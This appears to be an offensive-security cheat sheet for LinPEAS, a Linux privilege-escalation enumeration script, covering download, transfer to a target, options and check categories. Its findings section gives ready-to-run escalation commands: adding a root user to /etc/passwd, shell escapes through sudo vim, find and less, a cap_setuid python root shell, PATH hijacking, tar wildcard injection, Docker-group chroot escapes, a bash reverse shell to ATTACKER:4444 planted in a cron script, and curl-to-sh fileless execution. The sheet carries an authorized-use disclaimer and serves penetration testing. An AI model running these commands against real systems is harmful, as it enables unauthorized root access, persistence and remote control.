← All cheat sheets

LINPEAS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

LinPEAS is a script for Linux privilege escalation enumeration.
Part of the PEASS-ng suite for finding misconfigurations.

DOWNLOAD#

# From GitHub
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh

# Alternative
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

TRANSFER TO TARGET#


    

WEB SERVER#

# On attacker
python3 -m http.server 8000

# On target
wget http://ATTACKER:8000/linpeas.sh
curl http://ATTACKER:8000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh

EXECUTION WITHOUT TOUCHING DISK#

# Download and execute in memory
curl http://ATTACKER:8000/linpeas.sh | sh

# With bash
curl http://ATTACKER:8000/linpeas.sh | bash

# Base64 encoded
cat linpeas.sh | base64 -w0
# On target:
echo "BASE64_CONTENT" | base64 -d | bash

BASIC USAGE#

# Run all checks
./linpeas.sh

# Quiet mode (less output)
./linpeas.sh -q

# Superfast (only critical checks)
./linpeas.sh -s

# With password for sudo checks
./linpeas.sh -P 'password'

# Output to file
./linpeas.sh | tee linpeas_output.txt

# No colors (for file output)
./linpeas.sh -N | tee linpeas_output.txt

OPTIONS#

-h          Help
-q          Quiet mode
-s          Superfast (critical checks only)
-P PASS     Password for sudo
-N          No colors
-a          All checks (including slow)
-e          Extra enumeration
-t          Automatic network scan
-r          Regular expression for searching
-d          Debug mode
-o OUTPUT   Only execute selected checks

SELECTIVE CHECKS#

# Specific checks only
./linpeas.sh -o system_information
./linpeas.sh -o container
./linpeas.sh -o cloud
./linpeas.sh -o procs_crons_timers_srvcs_sockets
./linpeas.sh -o network_information
./linpeas.sh -o users_information
./linpeas.sh -o software_information
./linpeas.sh -o interesting_files
./linpeas.sh -o api_keys_regex

CHECK CATEGORIES#


    

SYSTEM INFORMATION#

# Kernel version and exploits
# OS release
# Sudo version
# PATH hijacking
# Date and uptime
# Environment variables

CONTAINER/VM DETECTION#

# Docker container detection
# LXC container
# Virtual machine
# Cloud environment (AWS, GCP, Azure)

AVAILABLE SOFTWARE#

# Installed packages
# Useful binaries
# Compilers (gcc, python, perl)
# Development tools

PROCESSES/CRONS/SERVICES#

# Running processes
# Cron jobs (all users)
# Systemd timers
# Active services
# Open ports
# Socket files

NETWORK INFORMATION#

# Network interfaces
# IP addresses
# Routing table
# ARP cache
# Open ports
# Active connections

USERS INFORMATION#

# Current user info
# All users
# Groups
# Sudo permissions
# SSH keys
# Password policy
# Login history

INTERESTING FILES#

# SUID/SGID binaries
# Capabilities
# Writable files in PATH
# Sensitive file permissions
# Config files
# Database files
# Backup files
# Password files
# SSH private keys
# AWS/cloud credentials

OUTPUT COLORS#

# RED/YELLOW     - 95% PE vector
# RED            - High probability PE
# CYAN           - Files with credentials
# GREEN          - Uncommon but interesting
# LIGHT_YELLOW   - Users with console
# LIGHT_GREY     - Other users

COMMON FINDINGS#


    

SUID BINARIES#

# Look for:
# - GTFOBins entries
# - Custom SUID binaries
# - Uncommon SUID

# Exploit example (nmap SUID)
nmap --interactive
!sh

WRITABLE FILES#

# /etc/passwd writable
echo 'newroot:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd

# Writable /etc/shadow
# Replace root hash

# Writable cron files
echo '* * * * * root /tmp/shell.sh' >> /etc/cron.d/job

CAPABILITIES#

# cap_setuid
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# cap_net_raw
# Sniff traffic

# cap_dac_read_search
# Read any file

SUDO MISCONFIGURATION#

# sudo -l output
# (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'

# (ALL) NOPASSWD: /usr/bin/find
sudo find . -exec /bin/bash \;

# (ALL) NOPASSWD: /usr/bin/less
sudo less /etc/passwd
!/bin/bash

PATH HIJACKING#

# Writable directory in PATH
export PATH=/tmp:$PATH
echo '/bin/bash' > /tmp/cmd
chmod +x /tmp/cmd

# Wait for privileged process to call 'cmd'

CRON JOB ABUSE#

# Writable cron script
echo '/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /opt/backup.sh

# Wildcard injection
# cron: tar czf /backup/backup.tar.gz *
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"

DOCKER ESCAPE#

# User in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# docker.sock accessible
docker -H unix:///var/run/docker.sock run -v /:/mnt -it alpine chroot /mnt

KERNEL EXPLOITS#

# Check kernel version
uname -a

# Common exploits:
# - DirtyCow (CVE-2016-5195)
# - DirtyPipe (CVE-2022-0847)
# - PwnKit (CVE-2021-4034)

INTEGRATION#

# With Metasploit
# Upload and run via Meterpreter
upload linpeas.sh /tmp/linpeas.sh
shell
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh

# Save output for analysis
./linpeas.sh -N > /tmp/linpeas.txt
# Download and analyze

QUICK REFERENCE#

./linpeas.sh                     # Run all checks
./linpeas.sh -s                  # Fast scan
./linpeas.sh -q                  # Quiet mode
./linpeas.sh -P 'pass'           # With sudo password
./linpeas.sh -N | tee out.txt    # Save output
curl URL/linpeas.sh | sh         # Memory execution